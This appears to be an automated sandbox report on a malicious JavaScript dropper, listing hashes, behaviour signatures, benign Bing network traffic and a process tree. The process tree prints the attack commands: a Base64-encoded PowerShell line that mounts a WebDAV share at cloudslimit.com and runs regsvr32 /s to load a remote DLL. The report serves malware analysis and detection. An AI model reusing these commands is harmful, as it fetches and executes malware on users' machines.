Resubmissions

23/07/2024, 12:32 UTC

240723-pqy1xazcrn 7

23/07/2024, 12:30 UTC

240723-pptpsszclp 7

23/07/2024, 12:25 UTC

240723-plpxfasekc 3

23/07/2024, 11:25 UTC

240723-nja5tstane 7

Analysis

  • max time kernel
    429s
  • max time network
    437s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/07/2024, 12:32 UTC

General

  • Target

    509796302373421174.js

  • Size

    16KB

  • MD5

    d0a2db4f470f5c1e8685de93c9540aa1

  • SHA1

    29cc30ba0638c236df388b78ec2e23d151bfa606

  • SHA256

    4f85809b3bc35cf82796af6a2d8ecf2afa91673a63ba1e1e7e91f45b9b7e9622

  • SHA512

    f1f668bee0d27de479256e306519f558bd14d657e45c0a1f3f7523e5ac00688cbf06dd87f4b387e8f16bec4424014a7b37e7322e077943eed8b700ff08a8406a

  • SSDEEP

    96:joMAiwH1hNkOWPw6Kb1+4a5DOgAo31yRbcpP4iWnwrdDUnqEnI5yc9gAzdHemwFw:WNMAs1EIpJJuy8AmISbppU

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\509796302373421174.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANQA3ADMAOAAxADgANgAyADgAOQAwADAALgBkAGwAbAA=
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
        3⤵
          PID:4996
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\14573818628900.dll
          3⤵
            PID:4752

      Network

      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        73.144.22.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.144.22.2.in-addr.arpa
        IN PTR
        Response
        73.144.22.2.in-addr.arpa
        IN PTR
        a2-22-144-73deploystaticakamaitechnologiescom
      • flag-us
        DNS
        23.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.dual-a-0034.a-msedge.net
        g-bing-com.dual-a-0034.a-msedge.net
        IN CNAME
        dual-a-0034.a-msedge.net
        dual-a-0034.a-msedge.net
        IN A
        13.107.21.237
        dual-a-0034.a-msedge.net
        IN A
        204.79.197.237
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
        Remote address:
        13.107.21.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=2F739C9468436BF61BA7885169A36A57; domain=.bing.com; expires=Sun, 17-Aug-2025 13:49:36 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: F5739CD74F944D209059FE2CDF0EDB21 Ref B: LON04EDGE1011 Ref C: 2024-07-23T13:49:36Z
        date: Tue, 23 Jul 2024 13:49:35 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
        Remote address:
        13.107.21.237:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=2F739C9468436BF61BA7885169A36A57
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=us7MakUql6Q2KrHCU6P6BU1izvCD9-i_bd95gtX8wdM; domain=.bing.com; expires=Sun, 17-Aug-2025 13:49:36 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 9BC6D64EB5AD452582B3E6B3C34A2531 Ref B: LON04EDGE1011 Ref C: 2024-07-23T13:49:36Z
        date: Tue, 23 Jul 2024 13:49:35 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
        Remote address:
        13.107.21.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=2F739C9468436BF61BA7885169A36A57; MSPTC=us7MakUql6Q2KrHCU6P6BU1izvCD9-i_bd95gtX8wdM
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: B683C28D4AC74D38B1186ED011B74C80 Ref B: LON04EDGE1011 Ref C: 2024-07-23T13:49:36Z
        date: Tue, 23 Jul 2024 13:49:35 GMT
      • flag-us
        DNS
        45.19.74.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.19.74.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        237.21.107.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        237.21.107.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        133.211.185.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        133.211.185.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        133.211.185.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        133.211.185.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        133.211.185.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        133.211.185.52.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        157.123.68.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        157.123.68.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.31.95.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.31.95.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        121.170.16.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        121.170.16.2.in-addr.arpa
        IN PTR
        Response
        121.170.16.2.in-addr.arpa
        IN PTR
        a2-16-170-121deploystaticakamaitechnologiescom
      • flag-us
        DNS
        240.221.184.93.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.221.184.93.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        57.169.31.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        57.169.31.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.227.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.227.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        tse1.mm.bing.net
        Remote address:
        8.8.8.8:53
        Request
        tse1.mm.bing.net
        IN A
        Response
        tse1.mm.bing.net
        IN CNAME
        mm-mm.bing.net.trafficmanager.net
        mm-mm.bing.net.trafficmanager.net
        IN CNAME
        ax-0001.ax-msedge.net
        ax-0001.ax-msedge.net
        IN A
        150.171.28.10
        ax-0001.ax-msedge.net
        IN A
        150.171.27.10
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239340418537_1WA44EQA64JN0VKE0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        Remote address:
        150.171.28.10:443
        Request
        GET /th?id=OADD2.10239340418537_1WA44EQA64JN0VKE0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 639396
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 90492FD7D3BF4638ACE8A6A7152E2C2E Ref B: LON04EDGE0911 Ref C: 2024-07-23T13:51:13Z
        date: Tue, 23 Jul 2024 13:51:13 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        Remote address:
        150.171.28.10:443
        Request
        GET /th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 645633
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: C5B5CA39AA474C69B14C2712571C69D7 Ref B: LON04EDGE0911 Ref C: 2024-07-23T13:51:13Z
        date: Tue, 23 Jul 2024 13:51:13 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239317301365_1T2JA9OXDN9GY4HXW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        Remote address:
        150.171.28.10:443
        Request
        GET /th?id=OADD2.10239317301365_1T2JA9OXDN9GY4HXW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 578826
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 2A79F44C5A80437D84D3D4C69CB83237 Ref B: LON04EDGE0911 Ref C: 2024-07-23T13:51:13Z
        date: Tue, 23 Jul 2024 13:51:13 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239317300932_1F3XVYLI2C551DUEM&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        Remote address:
        150.171.28.10:443
        Request
        GET /th?id=OADD2.10239317300932_1F3XVYLI2C551DUEM&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 679925
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 8933D9A22D3F42B4BDB1F7E8EA8F91DF Ref B: LON04EDGE0911 Ref C: 2024-07-23T13:51:13Z
        date: Tue, 23 Jul 2024 13:51:13 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239353582481_1UFRZG7HSKJ6VOM8D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        Remote address:
        150.171.28.10:443
        Request
        GET /th?id=OADD2.10239353582481_1UFRZG7HSKJ6VOM8D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 751091
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 38B88F0A620941A9816897B0EC3F0D2F Ref B: LON04EDGE0911 Ref C: 2024-07-23T13:51:13Z
        date: Tue, 23 Jul 2024 13:51:13 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239340418538_115TEFRTVWJF1SFIA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        Remote address:
        150.171.28.10:443
        Request
        GET /th?id=OADD2.10239340418538_115TEFRTVWJF1SFIA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 693178
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 84212925DEB04EDEAEFCBC9D2991D7A8 Ref B: LON04EDGE0911 Ref C: 2024-07-23T13:51:14Z
        date: Tue, 23 Jul 2024 13:51:14 GMT
      • flag-us
        DNS
        123.10.44.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        123.10.44.20.in-addr.arpa
        IN PTR
        Response
      • 13.107.21.237:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
        tls, http2
        2.0kB
        9.3kB
        21
        18

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f7bdfe1de60443baa3fac2cbb3d85999&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=

        HTTP Response

        204
      • 150.171.28.10:443
        tse1.mm.bing.net
        tls, http2
        1.2kB
        6.9kB
        15
        13
      • 150.171.28.10:443
        tse1.mm.bing.net
        tls, http2
        1.2kB
        6.9kB
        15
        13
      • 150.171.28.10:443
        tse1.mm.bing.net
        tls, http2
        1.2kB
        6.9kB
        15
        13
      • 150.171.28.10:443
        tse1.mm.bing.net
        tls, http2
        1.2kB
        6.9kB
        15
        13
      • 150.171.28.10:443
        https://tse1.mm.bing.net/th?id=OADD2.10239340418538_115TEFRTVWJF1SFIA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        tls, http2
        144.4kB
        4.1MB
        2999
        2994

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239340418537_1WA44EQA64JN0VKE0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239317301365_1T2JA9OXDN9GY4HXW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239317300932_1F3XVYLI2C551DUEM&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239353582481_1UFRZG7HSKJ6VOM8D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

        HTTP Response

        200

        HTTP Response

        200

        HTTP Response

        200

        HTTP Response

        200

        HTTP Response

        200

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239340418538_115TEFRTVWJF1SFIA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

        HTTP Response

        200
      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        73.144.22.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        73.144.22.2.in-addr.arpa

      • 8.8.8.8:53
        23.159.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        23.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
        151 B
        1
        1

        DNS Request

        g.bing.com

        DNS Response

        13.107.21.237
        204.79.197.237

      • 8.8.8.8:53
        237.21.107.13.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        237.21.107.13.in-addr.arpa

      • 8.8.8.8:53
        45.19.74.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        45.19.74.20.in-addr.arpa

      • 8.8.8.8:53
        133.211.185.52.in-addr.arpa
        dns
        219 B
        147 B
        3
        1

        DNS Request

        133.211.185.52.in-addr.arpa

        DNS Request

        133.211.185.52.in-addr.arpa

        DNS Request

        133.211.185.52.in-addr.arpa

      • 8.8.8.8:53
        157.123.68.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        157.123.68.40.in-addr.arpa

      • 8.8.8.8:53
        18.31.95.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        18.31.95.13.in-addr.arpa

      • 8.8.8.8:53
        121.170.16.2.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        121.170.16.2.in-addr.arpa

      • 8.8.8.8:53
        240.221.184.93.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        240.221.184.93.in-addr.arpa

      • 8.8.8.8:53
        57.169.31.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        57.169.31.20.in-addr.arpa

      • 8.8.8.8:53
        13.227.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        13.227.111.52.in-addr.arpa

      • 8.8.8.8:53
        tse1.mm.bing.net
        dns
        62 B
        170 B
        1
        1

        DNS Request

        tse1.mm.bing.net

        DNS Response

        150.171.28.10
        150.171.27.10

      • 8.8.8.8:53
        123.10.44.20.in-addr.arpa
        dns
        71 B
        145 B
        1
        1

        DNS Request

        123.10.44.20.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwmaegko.ska.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2712-0-0x00007FFF727F3000-0x00007FFF727F5000-memory.dmp

        Filesize

        8KB

      • memory/2712-7-0x000001DC33AC0000-0x000001DC33AE2000-memory.dmp

        Filesize

        136KB

      • memory/2712-11-0x00007FFF727F0000-0x00007FFF732B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2712-12-0x00007FFF727F0000-0x00007FFF732B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2712-15-0x00007FFF727F0000-0x00007FFF732B1000-memory.dmp

        Filesize

        10.8MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.